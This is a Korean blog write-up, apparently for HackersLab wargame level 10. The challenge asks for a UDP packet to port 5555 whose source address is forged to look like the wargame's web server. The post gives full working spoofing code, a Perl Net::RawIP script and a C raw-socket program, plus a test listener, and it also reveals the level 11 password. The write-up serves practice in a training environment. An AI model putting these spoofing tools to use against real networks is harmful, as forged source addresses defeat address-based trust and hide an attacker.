현재 해킹 자유지대 서버에는 특정 데몬이 떠 있다. 이 데몬은 UDP 5555번 포트를 이용하는데 www.hackerslab.org 호스트로부터 레벨10의 패스워드와 이메일 주소가 담긴 패킷이 오면 그 email 주소로 level 11의 패스워드를 알려준다.
그 해당 포맷은 다음과 같다.
“Level10의 패스워드/email 주소”
Ex) level10 의 패스워드가 abcd 고 email 주소가 abc@aaa.ccc.ddd..rr 이라면
“abcd/abc@aaa.ccc.ddd.rr”
반드시 www.hackerslab.org 로부터 패킷이 와야 성공할 수 있으니 주의하기 바란다.
——————-
참고자료
http://dries.studentenweb.org/apt/packages/perl-Net-RawIP/info.html
http://metawire.org/~prasanna/Papers%20and%20Articles/Sockets/Socket_Programming_Tutorial.html
http://www.w00w00.org/files/
결론부터 말하면 이 문제 제대로 안됩니다… 라우터가 다 걸러버리니까;; 열라 삽질하고 나서 그냥 구글님께 패스워드 물어보셔야합니다. level 11 비번은 Permission denied 입니다. (d가 대문자이던가;; 잘 모르겠음.)
Perl 버젼 UDP Spoof
[root@protos tmp]# cat udpspoof.pl
#udpspoof.pl
use Net::RawIP;
$DESTINATION = “165.132.121.252”;
$DESTINATION_PORT = 5555;
$SOURCE_PORT = 200;
$SPOOFED_SOURCE = “211.239.123.39”;
$DATA = “Beauty and Beast/pool0078@hanmail.net”;
$new_socket = new Net::RawIP({udp =>{}});
$new_socket->set({ip => {saddr => $SPOOFED_SOURCE , daddr => $DESTINATION , tos => 22} ,
udp => {source => $SOURCE_PORT, dest => $DESTINATION_PORT, data => $DATA }});
$new_socket->send;
print “UDP Spoof done”;
C 버젼 UDP Spoof
[root@protos tmp]# cat udp.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define IPHDRSIZE sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)
#define ERROR -1
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
unsigned long int host2ip(char *serv)
{
struct hostent *hent;
struct sockaddr_in sinn;
if ((hent = gethostbyname(serv)) == NULL) {
perror(“gethostbyname”);
exit(ERROR);
}
bzero((char *)&sinn, sizeof(sinn));
bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
return sinn.sin_addr.s_addr;
}
int main(void)
{
unsigned long s_addr = inet_addr(“211.239.123.39”);
unsigned short s_port = 6666;
unsigned long d_addr = inet_addr(“211.239.123.40”);
unsigned short d_port = 5555;
char *datagram = “Beauty and Beast/**********@gmail.com”;
unsigned datasize = 37;
int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
int i = 1;
struct sockaddr_in sin;
struct udphdr *udp;
struct iphdr *ip;
unsigned char *data;
unsigned char packet[1024];
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i)) == ERROR) {
close(s);
exit(ERROR);
}
ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+IPHDRSIZE);
data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE);
memset(packet, 0, 1024);
udp->source = htons(s_port);
udp->dest = htons(d_port);
udp->len = htons(UDPHDRSIZE+datasize);
memcpy(data, datagram, datasize);
udp->check = 0;
memcpy(data, datagram, datasize);
memset(packet, 0, IPHDRSIZE);
ip->saddr = s_addr;
ip->daddr = d_addr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 245;
ip->id = random()%5985;
ip->protocol = 17;
ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
ip->check = 0;
ip->check = in_cksum((char *)packet,IPHDRSIZE);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = d_addr;
sin.sin_port = udp->dest;
i = sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
(struct sockaddr*)&sin, sizeof(struct sockaddr));
if (i == ERROR) {
perror(“sendto”);
exit(ERROR);
}
printf(“UDP sent.\n”);
return 0;
}
정상동작하는지 확인을 위한 listener
[root@protos tmp]# cat listener.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define MYPORT 5555 // the port users will be connecting to
#define MAXBUFLEN 100
int main(void)
{
int sockfd;
struct sockaddr_in my_addr; // my address information
struct sockaddr_in their_addr; // connector’s address information
int addr_len, numbytes;
char buf[MAXBUFLEN];
if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
perror(“socket”);
exit(1);
}
my_addr.sin_family = AF_INET; // host byte order
my_addr.sin_port = htons(MYPORT); // short, network byte order
my_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
memset(&(my_addr.sin_zero), ‘\0’, 8); // zero the rest of the struct
if (bind(sockfd, (struct sockaddr *)&my_addr,
sizeof(struct sockaddr)) == -1) {
perror(“bind”);
exit(1);
}
addr_len = sizeof(struct sockaddr);
if ((numbytes=recvfrom(sockfd,buf, MAXBUFLEN-1, 0,
(struct sockaddr *)&their_addr, &addr_len)) == -1) {
perror(“recvfrom”);
exit(1);
}
printf(“got packet from %s\n”,inet_ntoa(their_addr.sin_addr));
printf(“packet is %d bytes long\n”,numbytes);
buf[numbytes] = ‘\0’;
printf(“packet contains: [%s]\n”,buf);
close(sockfd);
return 0;
}
또는 ifconfig ppp0 웹서버아이피 up 한뒤에 그냥 UDP 패킷 보내도 되나 보아요.. 근데 그건 저도 잘 모름.
Leave a Reply